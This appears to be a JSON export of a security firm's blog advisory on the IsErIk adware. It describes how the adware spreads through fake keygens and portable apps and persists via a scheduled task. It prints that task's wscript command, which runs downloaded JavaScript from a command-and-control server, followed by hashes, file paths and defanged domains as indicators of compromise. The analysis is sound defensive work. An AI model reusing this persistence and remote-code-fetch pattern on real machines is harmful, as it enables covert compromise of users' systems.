{"id":3078,"date":"2021-08-18T15:31:39","date_gmt":"2021-08-18T13:31:39","guid":{"rendered":"https:\/\/fortgale.com\/news\/?p=3078"},"modified":"2026-06-08T23:10:35","modified_gmt":"2026-06-08T23:10:35","slug":"advanced-persistent-adware-iserik","status":"publish","type":"post","link":"https:\/\/fortgale.com\/blog\/emerging-threats\/advanced-persistent-adware-iserik\/","title":{"rendered":"Advanced Persistent Adware: IsErik"},"content":{"rendered":"\n<p style=\"text-align: justify\">This advisory is the result of analysis conducted by threat-intelligence analysts following the identification of a security anomaly during delivery of <a href=\"https:\/\/fortgale.com\/en\/managed-detection-and-response\/\">Managed Detection and Response<\/a> (MDR) services.<\/p>\n\n\n\n<p style=\"text-align: justify\">Specifically, the anomaly detected is associated with a particularly invasive and persistent adware-type software: <strong>ADWARE IsErIk<\/strong>.<\/p>\n\n\n\n<p style=\"text-align: justify\">This threat, categorized as <strong>Advanced Persistent Adware<\/strong>, is frequently disguised as &#8220;portable&#8221; versions of commercial products or as license key generators (<strong>keygen<\/strong>) for commercial applications. In certain cases the software requests user permission to install additional software, causing command execution on the target machine.<\/p>\n\n\n\n<p style=\"text-align: justify\">System infection occurs through creation of a <strong>scheduled task<\/strong> designed to execute <strong>JavaScript<\/strong> code via WScript. 
During incident response operations, the task name was identified as <strong>\\Secured Yahoo Powered nalel<\/strong>, used for execution of the command:<\/p>\n\n\n\n<p style=\"text-align: left\"><code>C:\\Windows\\system32\\wscript.exe \"C:\\ProgramData\\{38E1FD82-B2A3-7744-3465-XXXXXXX}\\tano.txt\" \"687474XXXXXXX636f6d\" \"433a5c50XXXXX237363243387d5c726572656669\" \"433a5c50726XXXXXXXX237363243387d5c7269646f746f64\" \"\/\/B\" \"\/\/E:jscript\" \"--IsErIk\"<\/code>,<\/p>\n\n\n\n<p style=\"text-align: justify\">which, after verifying the presence of the <code>--IsErIk<\/code> parameter, decodes the remaining parameters and connects to the command-and-control server (in this case the URL <strong>hxxps:\/\/ddukmql[.]com<\/strong>) and performs POST requests, whose responses consist of additional <strong>JavaScript code<\/strong> to be executed on the compromised system.<\/p>\n\n\n\n<h2 class=\"has-text-align-center wp-block-heading\" id=\"indicatori-di-compromissione\"><strong>Indicators of Compromise<\/strong><\/h2>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"sha256\"><strong>SHA256<\/strong><\/h3>\n\n\n\n<ul class=\"wp-block-list\"><li>2b89075ad9485d72bcf6548afaee7ba8d4fa0f77e874d62efd70c9c311dc406d (C:\\ProgramData\\{38E1FD82-B2A3-7744-3465-E906AE2762C8}\\tano.txt)<\/li><\/ul>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"file-path\"><strong>File Path<\/strong><\/h3>\n\n\n\n<ul class=\"wp-block-list\"><li>C:\\ProgramData\\{38E1FD82-B2A3-7744-3465-E906AE2762C8}\\tano.txt<\/li><li>C:\\ProgramData\\{89F74C94-03B5-C652-8573-58101F31D3DE}\\tofi.txt<\/li><li>C:\\ProgramData\\{F4723111-7E30-BBD7-F8F6-259562B4AE5B}\\rari.txt<\/li><li>C:\\ProgramData\\{595E9C3D-D31C-16FB-55DA-88B9CF980377}\\fala.txt<\/li><li>C:\\ProgramData\\{19B7DCD4-93F5-5612-1533-C8508F71439E}\\faso<\/li><li>C:\\ProgramData\\{F3BF36DC-79FD-BC1A-FF3B-22586579A996}\\doro<\/li><\/ul>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"domini\"><strong>Domains<\/strong><\/h3>\n\n\n\n<ul 
class=\"wp-block-list\"><li>ddukmql[.]com<\/li><li>katunaq[.]com<\/li><li>tdfpa[.]com<\/li><li>qajolos[.]com<\/li><li>butapujo[.]com<\/li><li>rududulu[.]com<\/li><\/ul>\n","protected":false},"excerpt":{"rendered":"<p>IsErik adware family with APT-style persistence: registry tampering, browser hijack persistence, removal complexity and detection considerations.<\/p>\n","protected":false},"author":1,"featured_media":2489,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[1701,3306,3307,1703,1705,1707,1709,1711,3308,1445],"class_list":["post-3078","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-emerging-threats","tag-adware-it","tag-adware-persistence","tag-browser-hijack","tag-iserik-it","tag-iserlk-it","tag-lserlk-it","tag-malicious-it","tag-persistent-it","tag-removal-complexity","tag-threat-it"],"_links":{"self":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/3078","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/comments?post=3078"}],"version-history":[{"count":2,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/3078\/revisions"}],"predecessor-version":[{"id":9909,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/3078\/revisions\/9909"}],"wp:attachment":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/media?parent=3078"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/categories?post=3078"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/tags?post=3078"
}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}